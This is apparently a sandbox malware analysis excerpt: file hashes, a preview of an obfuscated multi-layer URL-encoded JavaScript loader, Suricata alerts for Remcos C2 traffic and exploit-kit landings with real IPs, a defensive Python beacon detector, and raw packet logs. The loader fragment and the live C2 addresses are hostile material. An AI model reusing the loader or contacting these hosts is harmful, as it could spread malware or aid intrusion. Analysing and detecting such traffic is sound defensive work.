                                                SHA256:2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2
                                                SHA512:81fc9692f3e031cedbfd0623b69b21017504a8376e14ef3ee002b14517e857e45b07191bb84436e1bfebf1fa8fd6a375dc61716bebb253db2e4c015f740424b0
                                                SSDEEP:96:Ea+M7XjJ7GJyXOVKBhqCJgqC8R7JR2JacLZL+dJAcAT:Ea+QXjJaJpKBgVOJEJwdJArT
                                                TLSH:3CC3B09AEA3648ECBBCD9EA77EFC738D7A28235F6B461E51434B3646CC5170C808055C
                                                File Content Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatibl
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-25T18:49:56.463614+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49723 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:50:19.290790+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 104.168.32.148 | 80 | 192.168.2.5 | 49708 | TCP
2024-09-25T18:50:19.290790+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 104.168.32.148 | 80 | 192.168.2.5 | 49708 | TCP
2024-09-25T18:50:41.546804+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49711 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:51:03.935894+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49713 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:51:26.329688+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49715 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:51:48.885817+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49716 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:52:11.300191+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49717 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:52:33.741698+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49718 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:52:56.235749+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49719 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:53:18.658908+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49720 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:53:41.236809+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49721 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:54:03.773321+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49722 | 45.134.140.70 | 50312 | TCP
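The alert table shows the property that turns a single JA3 match into a confident C2 verdict: eleven Remcos JA3 alerts to 45.134.140.70:50312, each on a fresh source port, arrive roughly 22.5 seconds apart, and the one 45-second gap is about one skipped period. The script below is an added example (my own code, not Joe Sandbox's or Suricata's): it groups alerts by SID and remote endpoint, computes the inter-alert gaps, and flags a group as beaconing when most gaps sit within 10% of the median gap. Using the median rather than the mean is what keeps the doubled first gap from masking the cadence. ALERTS is the table above re-entered by hand as constructed input; the minimum alert count, tolerance and fraction are assumed thresholds to tune per environment.

```python
from datetime import datetime
from statistics import median

JA3_SIG = "ET JA3 Hash - Remcos 3.x/4.x TLS Connection"
EK_SIG = "ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 {} M1"

# Constructed input: the Suricata alerts from this report, re-entered as
# (timestamp, sid, signature, src_ip, src_port, dst_ip, dst_port).
ALERTS = [
    ("2024-09-25T18:49:56.463614+0200", 2036594, JA3_SIG, "192.168.2.5", 49723, "45.134.140.70", 50312),
    ("2024-09-25T18:50:19.290790+0200", 2020423, EK_SIG.format(1), "104.168.32.148", 80, "192.168.2.5", 49708),
    ("2024-09-25T18:50:19.290790+0200", 2020425, EK_SIG.format(3), "104.168.32.148", 80, "192.168.2.5", 49708),
    ("2024-09-25T18:50:41.546804+0200", 2036594, JA3_SIG, "192.168.2.5", 49711, "45.134.140.70", 50312),
    ("2024-09-25T18:51:03.935894+0200", 2036594, JA3_SIG, "192.168.2.5", 49713, "45.134.140.70", 50312),
    ("2024-09-25T18:51:26.329688+0200", 2036594, JA3_SIG, "192.168.2.5", 49715, "45.134.140.70", 50312),
    ("2024-09-25T18:51:48.885817+0200", 2036594, JA3_SIG, "192.168.2.5", 49716, "45.134.140.70", 50312),
    ("2024-09-25T18:52:11.300191+0200", 2036594, JA3_SIG, "192.168.2.5", 49717, "45.134.140.70", 50312),
    ("2024-09-25T18:52:33.741698+0200", 2036594, JA3_SIG, "192.168.2.5", 49718, "45.134.140.70", 50312),
    ("2024-09-25T18:52:56.235749+0200", 2036594, JA3_SIG, "192.168.2.5", 49719, "45.134.140.70", 50312),
    ("2024-09-25T18:53:18.658908+0200", 2036594, JA3_SIG, "192.168.2.5", 49720, "45.134.140.70", 50312),
    ("2024-09-25T18:53:41.236809+0200", 2036594, JA3_SIG, "192.168.2.5", 49721, "45.134.140.70", 50312),
    ("2024-09-25T18:54:03.773321+0200", 2036594, JA3_SIG, "192.168.2.5", 49722, "45.134.140.70", 50312),
]


def parse_ts(s):
    """Suricata-style timestamp with a +HHMM offset, as in the table above."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def group_alerts(alerts):
    """Key alerts by (sid, dst_ip, dst_port) and return sorted timestamps per key.

    The source port changes on every connection, so it is deliberately not
    part of the key; the remote endpoint is what stays constant for a beacon.
    """
    groups = {}
    for ts, sid, _sig, _src, _sport, dst, dport in alerts:
        groups.setdefault((sid, dst, dport), []).append(parse_ts(ts))
    for times in groups.values():
        times.sort()
    return groups


def gaps_seconds(times):
    """Inter-alert gaps in seconds for an already-sorted list of datetimes."""
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def beacon_candidates(alerts, min_alerts=5, tolerance=0.10, min_fraction=0.8):
    """Flag (sid, peer) groups whose gaps cluster tightly around their median.

    A group qualifies when it has at least min_alerts alerts and at least
    min_fraction of its gaps lie within tolerance of the median gap. One
    missed check-in produces a single doubled gap, which a median survives
    but a mean-and-stddev test would not.
    """
    results = []
    for (sid, dst, dport), times in group_alerts(alerts).items():
        if len(times) < min_alerts:
            continue
        gaps = gaps_seconds(times)
        period = median(gaps)
        if period <= 0:
            continue
        regular = sum(1 for g in gaps if abs(g - period) <= tolerance * period)
        fraction = regular / len(gaps)
        if fraction >= min_fraction:
            results.append({
                "sid": sid,
                "peer": f"{dst}:{dport}",
                "count": len(times),
                "period_s": round(period, 2),
                "regular_fraction": round(fraction, 2),
            })
    return results


if __name__ == "__main__":
    for hit in beacon_candidates(ALERTS):
        print(hit)
```

On this data the JA3 group is reported with a period of about 22.5 s and 9 of 10 gaps regular, while the two exploit-kit alerts (one each, same flow) never reach the minimum count and drop out. In production the same function runs over eve.json alerts, or over flow records without any signature at all, which is the point: the cadence to a fixed host:port is the signal, the JA3 hash only names the family.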
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 18:50:06.111886024 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.116779089 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.116990089 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.117193937 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.122107029 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613581896 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613610983 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613627911 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613698959 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613713980 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613732100 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613748074 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613765001 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613779068 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613781929 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.613794088 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.613852024 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.613883018 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.618721962 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.618769884 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.618784904 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.618798971 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.618799925 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.618818998 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.618844032 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.703967094 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.703989983 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.704016924 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.704031944 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.704049110 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.704158068 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.704385042 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.704402924 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.704411030 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.704418898 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.704451084 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.704476118 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.704948902 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705002069 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.705020905 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705037117 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705061913 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.705080986 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.705080986 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705100060 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705121994 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.705137014 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.705754995 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705807924 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705822945 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705835104 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.705849886 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.705866098 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.705914021 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705930948 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.705951929 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.705971003 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.706608057 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.706656933 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.706657887 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.706675053 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.706696987 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.706717968 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.706729889 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.706738949 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.706757069 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.706773043 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.709011078 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.709069014 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.794730902 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.794761896 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.794770002 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.794778109 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.794787884 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.794918060 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.794945002 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.794956923 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.794960022 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.794976950 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.794991016 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795002937 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795005083 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795018911 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795026064 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795031071 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795033932 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795043945 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795100927 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795578003 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795593977 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795614958 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795634031 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795646906 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795660973 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795661926 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795679092 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795687914 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795695066 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795713902 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795741081 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795830011 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795845985 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795870066 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795870066 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795887947 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.795890093 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795907974 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.795924902 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796473980 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796499014 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796513081 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796524048 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796530962 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796552896 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796576977 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796588898 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796605110 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796613932 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796663046 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796679020 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796689987 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796708107 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796724081 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796751022 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796761036 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796780109 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796799898 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796814919 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796829939 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796839952 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796845913 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796864986 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796876907 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796879053 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.796899080 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.796926022 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.797533035 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.797549009 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.797564983 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.797586918 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.797609091 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.797626972 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.797627926 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
Sep 25, 2024 18:50:06.797641993 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.797658920 CEST | 80 | 49704 | 104.168.32.148 | 192.168.2.5
Sep 25, 2024 18:50:06.797663927 CEST | 49704 | 80 | 192.168.2.5 | 104.168.32.148
                                                Sep 25, 2024 18:50:06.797677040 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.797683954 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.797700882 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.797717094 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885314941 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885338068 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885365963 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885381937 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885400057 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885418892 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885432005 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885507107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885507107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885507107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885507107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885586023 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885613918 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885629892 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885636091 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885658026 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885660887 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885674000 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885683060 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885690928 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885703087 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885708094 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885726929 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885737896 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885766029 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885771036 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885787964 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885816097 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885835886 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885900021 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885945082 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.885971069 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.885986090 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886002064 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886014938 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886029959 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886046886 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886151075 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886167049 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886183023 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886198044 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886217117 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886234999 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886239052 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886250019 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886265993 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886279106 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886298895 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886301041 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886315107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886316061 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886332035 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886343956 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886360884 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886375904 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886392117 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886415958 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886415958 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886415958 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886434078 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886878014 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886941910 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886944056 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886960983 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886991024 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887005091 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887007952 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887023926 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887039900 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887051105 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887057066 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887072086 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887090921 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887104988 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887196064 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887211084 CEST8049704104.168.32.148192.168.2.5
